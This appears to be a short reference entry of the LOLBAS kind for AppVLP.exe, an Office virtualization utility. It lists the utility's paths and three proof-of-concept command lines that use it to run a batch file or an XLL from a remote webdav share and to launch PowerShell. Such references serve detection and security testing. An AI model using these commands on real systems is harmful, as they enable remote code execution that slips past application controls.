~/# cat Appvlp.exe.md █
Application Virtualization Utility Included with Microsoft Office 2016
Paths:
C:\Program Files\Microsoft Office\root\client\appvlp.exe
C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
Detection:
Executes calc.bat through AppVLP.exe
AppVLP.exe \\webdav\calc.bat
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"